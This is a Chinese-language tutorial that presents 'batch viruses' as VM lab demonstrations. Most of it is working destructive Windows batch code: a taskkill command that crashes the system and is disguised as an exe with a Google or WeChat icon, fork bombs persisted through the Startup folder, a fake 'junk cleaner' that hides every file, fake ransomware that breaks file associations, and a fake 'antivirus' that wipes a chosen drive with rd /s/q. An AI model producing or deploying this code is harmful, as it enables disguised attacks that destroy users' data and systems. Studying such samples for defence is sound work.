几种批处理病毒的原理和实验

批处理病毒介绍：

批处理病毒是一种DOS命令的病毒，实质就是一些命令的组合，具有代码量小，技术门槛低，而危害性大的特点，所以很值得来学习，做一个初步的了解，方便同事以后在客户现场做病毒演示。以下病毒按作用效果分为了蓝屏、循环和破坏，它们三者之间也可以两两进行代码命令组合。

注：以下实验都在虚拟机中实验，并前期做好快照，真机实验后果自负

蓝屏篇：

工具：

ntsd是一个用户态进程调试工具，从Windows 2000就开始被附随在System32目录下。它能够结束除System、smss.exe、csrss.exe、lsass.exe及各种rootkit程序外所有的程序。但在Windows Vista及以上版本的Windows中不含ntsd

Winlogon.exe是windows登录管理器，位于C:\Windows\System32目录下，主要用于管理XP用户的登录和退出，处理用户登录和注销任务。

利用如下命令编辑bat文件：
针对win2003 ntsd -c q -pn winlogon.exe 强制杀死winlogon.exe这个程序
win2003由于被使用范围少不做演示

针对 win7或者win10 taskkill /f /fi “pid ne 1"强制杀死所有进程不等于1的进程” ne就是not equal

为了使bat程序的运行更具诱惑性，这里使用了bat_to_exe_converter.exe工具对bat文件进行伪装，步骤如下：

1. 新建文件并写上命令taskkill /f /fi “pid ne 1” 其中/f是强制 /fi是过滤筛选的意思
2. 选择ico图标路径，这里用的是谷歌图标，当然这里也可以换成微信图标或者其他xx图
3. 选定管理权限运行，然后生成taotao.exe文件如下

双击运行并选择继续
win10主机已蓝屏

注：服务主机：DCOM程序关闭蓝屏

循环篇：

利用如下命令编辑bat文件：

:a
start
goto a

不断打开 cmd窗口
双击运行该命令代码下的bat文件后，持续弹窗，导致占用大量资源无法启用其它的程序

%0|%0 

"%0"代表批处理自身的完整路径，“|”这个符号是将左侧的数据作为右侧侧参数执行，整句话的意思就是启动批处理自身，并且参数是自身，这样批处理就从新窗口启动了这个批处理，造成循环。（世界上最小的病毒）
双击运行该命令代码下的bat文件后，直接占满cpu和内存资源（图形化界面显示延迟，其实早已占满），导致无法处理其他指令

%0|%0
Copy win10.bat “%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\”

%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 自启动程序路径（只能重装操作系统），%userprofile%是一个变量，用来自动获取本机用户的命令

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp是操作系统自启动文件夹的路径，针对所有用户

如上两张图，双击运行该命令代码下的bat文件后，先把win10.bat复制到自启动路径 之下，然后开始执行%0|%0，直接占满资源

破坏篇：

数据可恢复：
互动隐藏：

@echo off
color 0a
echo 垃圾清理中........................回车
pause >nul 2>nul  #表示在屏幕上不做任何输出，固定写法
D:
cd \
attrib +s +h *.* /S /D >nul 2>nul #高级隐藏任意文件和文件夹，并不让命令显示
ping -n 2 127.0.0.1 >nul 2>nul 
echo 垃圾清理完毕
echo QQ:2895496732 >D:\Readme.txt
Pause

如图，这里我删掉了交互部分，双击运行bat文件
这里是高级隐藏，显示隐藏项目后依然无法显示
运行恢复文件之后已经恢复了E盘中的所有文件

恢复：

把上述中命令改为：attrib -s -h *.* /S /D >nul 2>nul

假装是勒索病毒加密：

@echo off
color 0a
echo 垃圾清理中........................回车
pause >nul 2>nul

assoc .txt=exefile >nul 2>nul  #把txt文件换成exe文件，下面依次类推
assoc .mp3=exefile >nul 2>nul
assoc .mp4=exefile >nul 2>nul
assoc .bmp=exefile >nul 2>nul
assoc .jpg=exefile >nul 2>nul
assoc .png=exefile >nul 2>nul
assoc .doc=exefile >nul 2>nul
assoc .docx=exefile >nul 2>nul

echo msgbox "你已经中了勒索病毒"  > hello.vbs #生成并调用一个VBS弹窗
call hello.vbs

实质上就是更改后缀的命令

恢复方式：

assoc .txt=txtfile >nul 2>nul  #
assoc .mp3=mp3file >nul 2>nul
assoc .mp4=mp4file >nul 2>nul
assoc .bmp=bmpfile >nul 2>nul
assoc .jpg=jpgfile >nul 2>nul
assoc .png=pngfile >nul 2>nul
assoc .doc=docfile >nul 2>nul
assoc .docx=docxfile >nul 2>nul

数据不可恢复：

@echo off
color 0a
echo ======================
echo    杀毒软件1.0版本
echo ======================
set /p pan=请输入杀毒的分区盘符号：
rd %pan%: /s/q >nul 2>nul
echo  杀毒进行中

可以直接删除你选定盘符下的所有文件，且不在垃圾回收站中出现，只能通过专业的数据恢复公司去恢复；当然这里的代码也可以不具有交互性，直接删掉指定盘符下的所有文件，C盘除外，目前C盘都有保护机制很多文件具有系统级别的权限。